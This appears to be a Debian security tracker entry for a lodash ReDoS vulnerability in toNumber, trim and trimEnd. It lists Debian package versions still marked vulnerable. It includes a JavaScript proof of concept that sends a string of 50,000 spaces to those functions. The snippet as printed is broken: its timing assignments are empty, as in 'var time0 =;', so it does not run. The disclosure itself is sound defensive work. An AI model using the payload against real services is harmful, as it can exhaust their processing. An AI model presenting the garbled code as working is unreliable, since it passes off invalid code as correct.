DescriptionAll versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 =; lo.trim(s) var time_cost0 = - time0; console.log("time_cost0: " + time_cost0) var time1 =; lo.toNumber(s) var time_cost1 = - time1; console.log("time_cost1: " + time_cost1) var time2 =; lo.trimEnd(s) var time_cost2 = - time2; console.log("time_cost2: " + time_cost2)
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)
NVD severitymedium

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
node-lodash (PTS)stretch4.16.6+dfsg-2vulnerable
bullseye, sid4.17.20+dfsg+~cs8.31.172-1vulnerable

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs


Search for package or bug name: Reporting problems